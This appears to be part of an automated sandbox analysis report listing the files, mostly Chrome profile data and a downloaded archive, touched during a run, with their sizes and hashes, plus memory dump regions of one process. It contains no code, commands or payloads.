Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
c41e2f37480c048a503fbd76daa33ac2

SHA1
cb9b6e93117311949efb869cd9e4d559ef4aae0a

SHA256
8aa4880103a70f0154eb502f7c519062b5201d490ade6a9641c156f9649bc79c

SHA512
708fcb575a474d31430ddb7a904c3d8d661d7ef89483275262cbcf99fd4b4215892630b22cc6ec72a7291292b16b37ffa89350b82bca3f4851878ad974792058

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
0e38894779ecfb4b48da8e90821ef91f

SHA1
1051023f90d930fda82a87f4c796529a593e4cfb

SHA256
22791f783fef029b825da9e302d8162569aaded71adbd8389fb98724560fb73f

SHA512
70faa11a6a44842f0b7449387c3cbe8943eed6cfdc47f34b6dceb3cf967f0e176daa6d56f8d1abece9028639c46ceaa98533c99b6bada9c908a2ce9abdeba613

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
4cc03b4e2f61ba38d6e306eba65fa818

SHA1
8674dbf31dbbefaac1fc4192783e22a59d3fc73c

SHA256
28f4355ca667faf2584a0a18874b19a05632479a4da226c69d6bad92f870e3ca

SHA512
d1fcfbb0b4d3e8e13f9a2c6afd96ca6813fe484096cffe670dfbd054c0d47eabdcbb4981e8605654d713fe134bb78cde9c88a5988a75526e3408bafef251a2bb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
993863ffed4c1b8d6176ccacdd34f708

SHA1
12e680bf99c5452bf399503d29da49fed20e43f6

SHA256
5981e2ac6ff34c7e672611929dff97ea21fc084bf15617081f3c0a592dc5ada0

SHA512
622bcab75cbb375b54576518579e4d35ab1f1b17811a03e1bb6d37a6bb9d4f026ca6ee54e279aecfa363a7e04b897f4a66f39899e7372568eb6921c0c33a5d78

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
b25f258e758bf1e480bed434c519fc89

SHA1
e0484d602ebe09b783875963566b7640e210cee0

SHA256
33a3df2c08fd63790352c9a5f24f49c24127a32c11974e67d2248f6d8e4d35f6

SHA512
a176f45b98e39dd4c94e13f9414329aae5e6df516373ba0582d8d57b4f1ff5f751fc0ccf0b30df686b931e840081f857384a2eaf030ac76c744973f4549ed96e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
873B

MD5
b138ba958080931bcfaeeeb1528d645c

SHA1
5f72e46f5108cc5904aaa663abefb654af31d346

SHA256
fcf8ed6a5bcfe5e1f255c8d906b71bef4b8ec95cd9a98593922c7aa838b6d395

SHA512
ab0a81939175059a62b730fdc2162ba0629b86eb280a3a6ca4473cd77a88c0715dbe234d62e85fc2bd89dfebed86cf2bad16314130017d9dfce98426d14e5c70

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
873B

MD5
a6720ea0eac02a1d19a09f28d96005ce

SHA1
51dd666ef6df05e10aab048a0b9c9e1647a31df6

SHA256
8020c80218803717398c413c98535a207c09a1a50af344654d35468361088c43

SHA512
2f431c279ab3c62938899d2cb4b8c253f59d363399d089e9e7191576a1e068a3fe9fb0d5465ee5aad49fabfdcc164c3a1c516fa4a33e0c8a8506ef8a1d9a759a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
873B

MD5
16ae1f120601db6f9126ee5c8ee90e60

SHA1
aa9e02c3f1bc6c920d8b17401f252c958aa2c4f7

SHA256
bae0ae591e70f384c48c6a26e7518e8cee72d093ee355dd9a50e10fb0a54ce93

SHA512
fab1e12fe5feb86b762ad5a5ed3b4214d45dda006fbd65a8b223235ab356f146f290d9f6a8d35459b681dc94886c674bb93430e7e0dd772ee237c973ed62c935

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
74a93c9a01a7da63752399102de4ce1d

SHA1
d01f5681382d8a2737f1e1c64db11eb73638d51b

SHA256
4a9f85f8113445f93c30a301a2d64be994d30a63c561cd2ed5c0ece53ce74c5a

SHA512
b55c2bc8894f3339ba2f44515844f71acb972ab6e82fcabf6210c7f3b9c3ef50d43efe808d35d87a3d5b7ac33282e1bfd1c39ab1cbc5a419e2ceda81d6dc1586

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
03d88e71bf897740aec6f5402f8b7f15

SHA1
346990d7511f83bec82181d737dec04a5d8d53c5

SHA256
ac4dff16637be7d636513829f2508ce770bb2c98f4ed0fec6ed0a8547bca70bf

SHA512
962bf3441c81804de12123d6133c17862da7055d4003943d699002e5250da2134f9a11faa3416d20f53ad8179c59f2f7c12035a0720a17c53a0e744f3fe6c4f7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
4a604c445e4e112cfac877d2456316e2

SHA1
c4e68b939568d427f7b5f18c7619afa6b5a74873

SHA256
4fcb9ebe94e3dbfa7599fdaf6a9bfcb0342d727875e86e2cf54730704d8b3992

SHA512
d5b8bf5db473f30c6cbb8f991019ccee0153c6e347843dce146503c0f3e6b28ab0e5aebff6aac98c79f25f60f4154830cb59a757482eed1f0f54232e7b8dc9e6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
c2c61adb6d8c27d45907fca5c196e6c5

SHA1
ef54e2fa34bfb1da3307bcbf77ce8093635d3027

SHA256
c0506884a5f3c9b0d8c7b5ce6de05c6aa08bf21a10c1a28494c51d7aa9e45125

SHA512
629afae96daee91ac8181c929054b54d733e26152ede0190a2d5a39c5f16168ca51e18787288e97b5f8781e06e50d57b5285da9b243aee34890123cc0bd50ea6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
cc0e2cc5cc827090db5d739b7c71bab7

SHA1
209fa7d1cfcbb4fb8684872f09e343c244308cb6

SHA256
9523491f69892d6e7f10face952db2b12cc829120da9b56c1c7a21e1417122b6

SHA512
f92c34cc26f6974e13c544d5e8cc201e2eb12cf2032faa1ba88509985fc8768497f3dd56d715488ca1224175dbcd8044c66784cf6e87e8a99cd0880ba8a15a20

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
8f9d4bb74c818b6f44342e01b3c48b5b

SHA1
7abe90b099dc6868e621660b83ec5addc85153d8

SHA256
da01f6d5354380ed6d474df160c3f22ea08efe8f411b249b55afabb5ed14e3f0

SHA512
c96d0129c0e8018fd69755806f713bceba5c46fe4d02e19675d89f7afd1cdad1f0f641efd324f2da21e236a033d4f7bf9bcd795671cabb3e16be768977bc299f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
200KB

MD5
6ee7c4e3e4e66baec4748e8eb6222cb6

SHA1
84ad71689901b0cc6b08713fbc4de6efa65b7505

SHA256
c844fb785aa656763754c215bfb02b2f43883636cc48bc9afbe280f1f240a532

SHA512
f8cc17e97a6992b6581080a99ee65a660e4cf3f2c050a04e51a4e5261716631a8c61f443ca72ee492ae6f0b5bd89ba220f2ae1a45aa1c814f1d668fe13c2b491

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
200KB

MD5
bf7afe5770b3eea514e6c6ee293ac400

SHA1
c8281783dabef39dcbbf46176f5be62acee620fe

SHA256
449140870debfc2aa0a235f8419d430c4976e21ffc2e3173a03c118cb3f85879

SHA512
4e706dd36fafac98aca0c243c4f550d996744ede4eb36e7c331a7e352db0e52708e337886fa9ce621412ebd4c2e58d9f9fdb6b614aa59198f7b997d6d987ee32

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
109KB

MD5
b7cef851b55e894f5a6504dbfa542114

SHA1
6a600ab93528cb1a3b06e24735ce26a5beb865b0

SHA256
692954589089a5b6a03eeb392053d396c7e2428d99fbb28950b92437fd6f0912

SHA512
8d81577ba0cc8ebf071837c041af4c14c1c37fd8b0dfc02b3a5497956f2eab9bab98b42ff1fb549a116d4c78575ba77d28b12a682bc234c1a8af9252ba087d54

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57d85e.TMP

Filesize
100KB

MD5
d27c1f009313d22da4ed1d20c26a0b15

SHA1
6e8cb07fe13620dd34d21611913206c6c43c56c7

SHA256
7b4417c17075c704db50ae84ed13b735d60caa6652e4c6f38ff6d4ed590c3dcf

SHA512
ff15eff85e1a45555b7fdd3a6ae30ae741ca44ca75e6684aad9f6e5e44e21070460b4a251510277fcb759775879298baad1ab1ba386722cb1bc20292a0dff5c1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
28KB

MD5
380029c915aa6610b72e12b3c321c297

SHA1
7bb2332cacdac23783f33b80b959ab0a43c839eb

SHA256
62bf9790c9135a0d9d648a6575e393ce9095b8114464f64bcb73ce930cb77714

SHA512
5d8e67a2c77cdc22b4e305942eaa75b5fc7ea641ce375b0de286049505a204fdcd54f3ada01d62d18b7d5afe20b7ec3acc655c7f712a1376c0f7db0855114280

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
28KB

MD5
380029c915aa6610b72e12b3c321c297

SHA1
7bb2332cacdac23783f33b80b959ab0a43c839eb

SHA256
62bf9790c9135a0d9d648a6575e393ce9095b8114464f64bcb73ce930cb77714

SHA512
5d8e67a2c77cdc22b4e305942eaa75b5fc7ea641ce375b0de286049505a204fdcd54f3ada01d62d18b7d5afe20b7ec3acc655c7f712a1376c0f7db0855114280

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_htjyjg1j.rty.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Pwzx.zip

Filesize
126KB

MD5
fe8cbebcd06e58cb78f9c6617a63a378

SHA1
50cb2b254c6c7033af5d1c90eb4f66fc5ed7a94b

SHA256
63ed6d3488e699ddfaf87111491b9767200f00311d3e0a5c9951b603c8520736

SHA512
af1ce2dbfcf3cbc781dae967c24e002e4991536fe93c93a1e00612529ea070e3093866eff36bcbceecf96e80db7118ff71de3cc04d3c6e5054a68755b942b6ff

Download Submit
memory/3952-339-0x00000000065E0000-0x00000000065FA000-memory.dmp

Filesize
104KB

Download
memory/3952-342-0x0000000008490000-0x0000000008A34000-memory.dmp

Filesize
5.6MB

Download
memory/3952-325-0x00000000059C0000-0x0000000005A26000-memory.dmp

Filesize
408KB

Download
memory/3952-336-0x00000000060A0000-0x00000000060BE000-memory.dmp

Filesize
120KB

Download
memory/3952-337-0x0000000002B60000-0x0000000002B70000-memory.dmp

Filesize
64KB

Download
memory/3952-338-0x00000000076E0000-0x0000000007D5A000-memory.dmp

Filesize
6.5MB

Download
memory/3952-321-0x0000000005260000-0x0000000005888000-memory.dmp

Filesize
6.2MB

Download
memory/3952-340-0x0000000007E40000-0x0000000007ED6000-memory.dmp

Filesize
600KB

Download
memory/3952-341-0x0000000007DD0000-0x0000000007DF2000-memory.dmp

Filesize
136KB

Download
memory/3952-331-0x0000000005AA0000-0x0000000005B06000-memory.dmp

Filesize
408KB

Download
memory/3952-343-0x0000000002B60000-0x0000000002B70000-memory.dmp

Filesize
64KB

Download
memory/3952-344-0x0000000002B60000-0x0000000002B70000-memory.dmp

Filesize
64KB

Download
memory/3952-345-0x0000000002B60000-0x0000000002B70000-memory.dmp

Filesize
64KB

Download
memory/3952-318-0x0000000002AD0000-0x0000000002B06000-memory.dmp

Filesize
216KB

Download
memory/3952-324-0x00000000051F0000-0x0000000005212000-memory.dmp

Filesize
136KB

Download
memory/3952-323-0x0000000002B60000-0x0000000002B70000-memory.dmp

Filesize
64KB

Download
memory/3952-322-0x0000000002B60000-0x0000000002B70000-memory.dmp

Filesize
64KB

Download